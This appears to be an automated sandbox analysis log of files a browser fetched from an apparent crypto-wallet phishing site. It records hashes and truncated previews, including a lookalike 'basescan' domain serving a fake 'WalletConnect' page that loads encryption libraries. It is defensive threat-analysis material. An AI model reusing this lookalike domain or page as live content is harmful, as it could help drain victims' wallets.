                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/assets/vendor/jquery-mousewheel/3.1.13/jquery.mousewheel.min.js
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 400x400, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):4528
                                                                                                                                                                                                                                              Entropy (8bit):7.945809175120278
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:Wp/XPclPRuhSyyTRD26o7RJlP+KcbjDU6x82rBO1DqPBs7+/:Wp//kP5nd26o7RP+/I6x82rER4
                                                                                                                                                                                                                                              MD5:EF096787734C20292B4716153B5FF1F2
                                                                                                                                                                                                                                              SHA1:F2BAF10DB0E6638EC674E5F58965EFFFE5028978
                                                                                                                                                                                                                                              SHA-256:518E46638E983E3545E1433BA06C2F7B4E874EED7802C809CACA237245D1864C
                                                                                                                                                                                                                                              SHA-512:C3EFDA8570AF483768F292E395AFE56FCE4046CF0260989D369544DFDAA6CB039F8E5E837AD7BA2651144B6E12C166708426647F144760ECD8AA396ECADC85B7
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://api.web3modal.com/public/getAssetImage/41d04d42-da3b-4453-8506-668cc0727900
                                                                                                                                                                                                                                              Preview:RIFF....WEBPVP8 ....pe...*....>I$.E..!... (....~>L...[.s...o.....&.(........7..<......./....._........[.C.._..Zo.....z....C...q...........}..+...o..IG....K._.~L.........C..~.R{.....o..?....*.^g.6.1.Q.g......-*..<z...^7W..:..Fm.RcM........LiTf...C.......9..l...^6..."X...k....D..L.e.o....:..Fbf4..G...X.G.'......T;..7x^.BX.......6v..^......F.....q....UEu....gT.Vq..\!......-f.J..}.../W...:..&l..'1...|...$gg..9.^.5.0......^=.??..O.9s...,...k>...CY!.I(A......$..........*....i.F2{Xv$0...?.(.._<=Oq.C.j..5.....k|....J....@.X...).i.?du...N(.....i..O..Gvo...m.....@....c1.3......{.B/..1R.:e..Nb?..6.%%,..=......6r.......Zn#.ZU..@...ei6...K...o1.eT...%?.x.Jjc........e....5....9e.....P.9VuI.*....B..r\.3.........f2...!.^6.r:E.2..d]G.....C.e..<G...E.\..Fm.....*...ul.GF.:...LiTg.6.1.Q.gT......?.m. .......6&).<....P..n1a.hN..,4)..Uk....a.t.p.0d......1H..6.pr.D"....o.k...L. ..n!..w.....&.,..E..Qh.4pH.ai...z...cc..@..U..........q..g...x...U..|...o.j...
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/loaderImage.gif
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 200 x 267, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):35600
                                                                                                                                                                                                                                              Entropy (8bit):7.990863075665379
                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                              SSDEEP:768:Krpx2xx0rPq8KQsPHKtW3LqYop7xsaLfVHKl2:KrPCOvKQsitW7ToQe
                                                                                                                                                                                                                                              MD5:7C6D959EF7EE0D6FDA7FB65AB76D7BA4
                                                                                                                                                                                                                                              SHA1:EA1AB5A7163B165D61F98F66DF50863F0856D5F3
                                                                                                                                                                                                                                              SHA-256:B844879A2810706AA737D95306625582CC96C66724B32C1348E77F5ED40C22FD
                                                                                                                                                                                                                                              SHA-512:B310CB6E9878B489BF2C80F9B825D3B64BDE3F07184A551BFB9152CD02D2FE0C32D68C43950A7C0566F73B53970EFC01B43661617764AB37A483869CE0C3DDBE
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR...............9.....sRGB.........PLTE............"Ww....-<...)\u....4F....8O....Xz....&6...&Xs.......Km.... ........Mr#Qq%ax.^.............EV...........&..........-@............Uz.....#Sh......w..:H.f....p.......1...Nc............{n.......o........`..(.*..........z...........O..L?P......-.....j.$......10...?#*?..+.....#...qa.RG1..R'.tg.........{+....?2B...2..*.H.`T.7...7,......^Zl^..#...K..............#.0)7.NQ0HU.p~=B....<:...eVc8*U.I@V25.1WJZ.x..v..nd...=VdG:b.u....Xq..r...eAFb.....bU|{q}......lep...U..Q..?........{.W.....o...%.....D...Z.k...gh.e....TLn&.....l.......H.......`4.{~OgsN...IW~..~OSW..x../......`..F..^...q:B...N.......6.7?v...;...B.lG&t..].........4p..4.....it.......n9.`p...;gx.....P.D................Rt...5...p]...i...w....*...h.(...p..k{..~sH............. .IDATx^...TSi.....k....?W..b."?.V5......G.BR@ ...t.:.). ..!.@..Le`.S.2....e(PfO1.24..\...,J..w.hu.s.*3........}{c......5;;x.v...O.>.......?.....vv...N.B.8.....~
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (376), with no line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):376
                                                                                                                                                                                                                                              Entropy (8bit):4.709133086364932
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:QkvFrWn0s0s0s0s0s0s0s0s1PAQUYm6SfVVVVVVVVmn:Qk0AQUL6Sun
                                                                                                                                                                                                                                              MD5:15EC9D4740ACA982FF817D45E0905FAA
                                                                                                                                                                                                                                              SHA1:B474FFEE04276080064ED5367753AA8ADA7829FC
                                                                                                                                                                                                                                              SHA-256:252580C216491706409DA9C3DC846C99956C264EF9A6B031279BF10CB1EB17EE
                                                                                                                                                                                                                                              SHA-512:F4096EDAE1D6B1FACD86E4E82F9EC8F89549319CBC50DA65C283BF9E68518857D2699B2903C56A9FE997FED2C92CB95E983A2E9424024AC2CF7A83F66FBA47B5
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzIScgmpue9BDMedbhIFDRppjN8SBQ09H1M8EgUNWrHXEBIFDcGhthwSBQ3BobYcEgUNMeUv_hIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_xIXCWWIXn0AAOPcEgUNGmmM3xIFDT0fUzwSEAlBCdISZwSuWhIFDVqx1xASFwlaBNe_WLhjZBIFDcGhthwSBQ3BobYcEk8J46cmNQVSPi0SBQ0x5S_-EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_?alt=proto
                                                                                                                                                                                                                                              Preview:CocBCgcNGmmM3xoACgcNPR9TPBoACgcNWrHXEBoACgcNwaG2HBoACgcNwaG2HBoACgcNMeUv/hoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoAChIKBw0aaYzfGgAKBw09H1M8GgAKCQoHDVqx1xAaAAoSCgcNwaG2HBoACgcNwaG2HBoACloKBw0x5S/+GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgA=
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (18802)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):18825
                                                                                                                                                                                                                                              Entropy (8bit):4.978677896920501
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:HDD130L01xZzveV2SV27uZRhC9XOmo221cY5cYWZdCg46fG5GRhrh5zc8C7yryF:jD1ZzvifxhC9dYSYOEa95z4yGF
                                                                                                                                                                                                                                              MD5:7E297ADA79115780DFA7124B3321DC50
                                                                                                                                                                                                                                              SHA1:9DB69AA6387703011C1BB114F1559D24075F0FB3
                                                                                                                                                                                                                                              SHA-256:EBDFE85826B09CAAD8A42D9BC4EEB78665DAFF9CB4B780473483204F16FEABE7
                                                                                                                                                                                                                                              SHA-512:5D51D3757892B730D885A4CF00BC137044CC9E8D0E9A66C92444C8BD96F0083A2335CB0335DD4B0B3292185ECE95ABA0EC49BB49B84E4FB3B550153035EFC691
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/lottery2/assets/index-a08e073c.js
                                                                                                                                                                                                                                              Preview:const e="Active",t="All",a="Canceled",o="Clear",r="Closed",i="Confirm",s="Copied",n="Copy",l="Details",c="Discount",u="Drawing",y="Draws",d="Expired",h="From",m="LOTTERY",w="Less",b="Lottery",k="You received __quantity__ free lottery ticket",p="The lottery results are in! Take a look of your winnings.",f="You have __quantity__ updates from Lottery",g="Match",_="Matches",T="Missed",v="More",L="Numbers",S="OFF",D="Odds",N="Past",C="Payout",B="Pending",P="Player",R="Popular",E="Prize",A="Profit",W="Rebet",M="Redeemed",I="Results",O="Rewards",x="Settled",Y="Status",F="Ticket",G="Tickets",V="Total",H="Verify",z="View",U="Win",J="cancelled",q="custom",j="ticket",$={"*This link is available for 24 hours from the time of generation. If the link is not used within this time frame, the amount you paid will be refunded to your wallet.":"*This link is available for 24 hours from the time of generation. If the link is not used within this time frame, the amount you paid will be refunded to your wal
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (4329)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):4330
                                                                                                                                                                                                                                              Entropy (8bit):5.335670450291742
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:7ylqMhha0L2B+BBOo14Ly8HmDKMu9JshmL8mzIPzigLDNAX:7EL2BAOo14Ly3K59SYNzI7iT
                                                                                                                                                                                                                                              MD5:746ED86882249153D38115740C56CDDB
                                                                                                                                                                                                                                              SHA1:A5921E309DCA46DEA76A134B98C7B3CB95917F55
                                                                                                                                                                                                                                              SHA-256:0179E7669871FF1F7043527849F62A34F1D3216C57112A5D77CD3B221148BA76
                                                                                                                                                                                                                                              SHA-512:7FEE49DD538D144221B59FAC0FD5E6EA5DE918F50C582B9854ADF13729554B78CE501E12B8329FA641796803398487725E5C93753534FB9D1EFFBC3BB95F9AEE
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:(function(d,c){var a="033e0828aecd8a15c31181716c4b1552";c.reviveAsync=c.reviveAsync||{};(function(e){if(typeof e.CustomEvent==="function"){return false}function g(i,j){j=j||{bubbles:false,cancelable:false,detail:undefined};var h=document.createEvent("CustomEvent");h.initCustomEvent(i,j.bubbles,j.cancelable,j.detail);return h}g.prototype=e.Event.prototype;e.CustomEvent=g})(c);try{if(!c.reviveAsync.hasOwnProperty(a)){var f=c.reviveAsync[a]={id:Object.keys(c.reviveAsync).length,name:"t8xt5pt6kr",ywpz:0,main:function(){var e=function(){var g=false;try{if(!g){g=true;d.removeEventListener("DOMContentLoaded",e,false);c.removeEventListener("load",e,false);f.addEventListener("start",f.start);f.addEventListener("refresh",f.refresh);f.dispatchEvent("start",{start:true})}}catch(h){console.log(h)}};f.dispatchEvent("init");if(d.readyState==="complete"){setTimeout(e)}else{d.addEventListener("DOMContentLoaded",e,false);c.addEventListener("load",e,false)}},start:function(g){if(g.detail&&g.detail.hasOwn
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1144)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):2595
                                                                                                                                                                                                                                              Entropy (8bit):4.9969695038964055
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:9CC4Us/lBL8lnQ2ZR4zKNIeN9huEY4raxzyKvZ1xhKWz+WBOeS/PxMnyKTY:Aos/n4lQ2ZR4+v96YaAobBEeS/Pdv
                                                                                                                                                                                                                                              MD5:10BDDEF181990AC892F74A9350700BCD
                                                                                                                                                                                                                                              SHA1:4007013D46A62F005C31F558DD92DEDAD8ED2279
                                                                                                                                                                                                                                              SHA-256:3C9F15679CEB7720448D31B4C5C58EB955D26AD4A69D3D97F901158F9E941291
                                                                                                                                                                                                                                              SHA-512:C332B1A9F333EC17A0ADDF956328CC6E106C79363CA1753B28EA26A1355859F85CBFB581DF8FB993304A804672103D5BBA91A6F1E905404E1F7C044082159B20
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:;(function($){'use strict';$.HSCore.components.HSGoTo={_baseConfig:{},pageCollection:$(),init:function(selector,config){this.collection=selector&&$(selector).length?$(selector):$();if(!$(selector).length)return;this.config=config&&$.isPlainObject(config)?$.extend({},this._baseConfig,config):this._baseConfig;this.config.itemSelector=selector;this.initGoTo();return this.pageCollection;},initGoTo:function(){var $self=this,collection=$self.pageCollection;this.collection.each(function(i,el){var $this=$(el),$target=$this.data('target'),isReferencedToPage=Boolean($this.data('is-referenced-to-page')),type=$this.data('type'),showEffect=$this.data('show-effect'),hideEffect=$this.data('hide-effect'),position=JSON.parse(el.getAttribute('data-position')),compensation=$($this.data('compensation')).outerHeight(),offsetTop=$this.data('offset-top'),targetOffsetTop=function(){if(compensation){return $target?$($target).offset().top-compensation:0;}else{return $target?$($target).offset().top:0;}};if(type=
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/config.js
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65248), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):81766
                                                                                                                                                                                                                                              Entropy (8bit):5.150917357797794
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:RLyGsuTxEudQc8fn3U/vCWHypWDWSCcFgj7COtOMG6JPkl+AIdbbhj1OkFhjrPu0:RLPXmfn37vpClHqrPupWEWQfGJ
                                                                                                                                                                                                                                              MD5:27BE120D954F482B0A30F7B11F1F6CFF
                                                                                                                                                                                                                                              SHA1:D45B0E27A308899C9151DCF03F7FF94721126E43
                                                                                                                                                                                                                                              SHA-256:6948CB29F8878AD5C975E668248AF6058815899264BDFBEC14731BD4AB401B87
                                                                                                                                                                                                                                              SHA-512:26B73A474A342097BB4741EE8279E464ABFF343F390EF308D8DD7BFAE1A29DEF04EE6C16B62AAC950915EE900C9DAE8A0CCF20F74775E611FA43EB0A09BD1131
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan.org/assets/vendor/cubeportfolio/js/jquery.cubeportfolio.min.js?v=24.4.4.9
                                                                                                                                                                                                                                              Preview:/*..* Cube Portfolio - Responsive jQuery Grid Plugin..*..* version: 4.4.0 (1 August, 2018)..* require: jQuery v1.8+..*..* Copyright 2013-2018, Mihai Buricea (http://scriptpie.com/cubeportfolio/live-preview/)..* Licensed under CodeCanyon License (http://codecanyon.net/licenses)..*..*/....!function(s,t,a,r){"use strict";function l(t,e,n){var i=this;if(s.data(t,"cubeportfolio"))throw new Error("cubeportfolio is already initialized. Destroy it before initialize again!");i.obj=t,i.$obj=s(t),s.data(i.obj,"cubeportfolio",i),e&&e.sortToPreventGaps!==r&&(e.sortByDimension=e.sortToPreventGaps,delete e.sortToPreventGaps),i.options=s.extend({},s.fn.cubeportfolio.options,e,i.$obj.data("cbp-options")),i.isAnimating=!0,i.defaultFilter=i.options.defaultFilter,i.registeredEvents=[],i.queue=[],i.addedWrapp=!1,s.isFunction(n)&&i.registerEvent("initFinish",n,!0);var o=i.$obj.children();i.$obj.addClass("cbp"),(0===o.length||o.first().hasClass("cbp-item"))&&(i.wrapInner(i.obj,"cbp-wrapper"),i.addedWrapp=!0)
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/style.css
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):89664
                                                                                                                                                                                                                                              Entropy (8bit):5.290543045467053
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:SjjxXUHJnxDjoXEZxkMV4PYDt0zxxf6gP3f8cApoEGOzZTBvUsuy8WnKdXwhLQvg:SdeIygP3fulzcsz8jlvaDioQ47GKH
                                                                                                                                                                                                                                              MD5:00727D1D5D9C90F7DE826F1A4A9CC632
                                                                                                                                                                                                                                              SHA1:EA61688671D0C3044F2C5B2F2C4AF0A6620AC6C2
